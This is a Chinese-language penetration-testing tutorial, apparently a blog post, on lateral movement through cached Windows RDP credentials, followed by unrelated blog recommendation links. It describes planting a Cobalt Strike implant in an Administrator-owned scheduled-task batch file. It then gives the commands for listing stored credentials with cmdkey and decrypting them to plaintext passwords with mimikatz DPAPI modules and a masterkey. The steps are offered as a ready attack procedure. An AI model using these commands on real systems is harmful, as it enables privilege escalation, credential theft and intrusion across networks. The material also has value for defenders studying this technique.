内网横向之RDP缓存利用

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

复制代码
cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

复制代码
privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

复制代码
privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

复制代码
 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

相关推荐
aiprtem35 分钟前
基于Flutter的web登录设计
前端·flutter
浪裡遊39 分钟前
React Hooks全面解析:从基础到高级的实用指南
开发语言·前端·javascript·react.js·node.js·ecmascript·php
why技术1 小时前
Stack Overflow,轰然倒下!
前端·人工智能·后端
GISer_Jing1 小时前
0704-0706上海,又聚上了
前端·新浪微博
止观止1 小时前
深入探索 pnpm:高效磁盘利用与灵活的包管理解决方案
前端·pnpm·前端工程化·包管理器
whale fall1 小时前
npm install安装的node_modules是什么
前端·npm·node.js
烛阴1 小时前
简单入门Python装饰器
前端·python
袁煦丞2 小时前
数据库设计神器DrawDB:cpolar内网穿透实验室第595个成功挑战
前端·程序员·远程工作
天天扭码2 小时前
从图片到语音:我是如何用两大模型API打造沉浸式英语学习工具的
前端·人工智能·github
失败又激情的man2 小时前
Scrapy进阶封装(第四阶段:中间件设置,动态UA,ip代理池)
爬虫·scrapy·中间件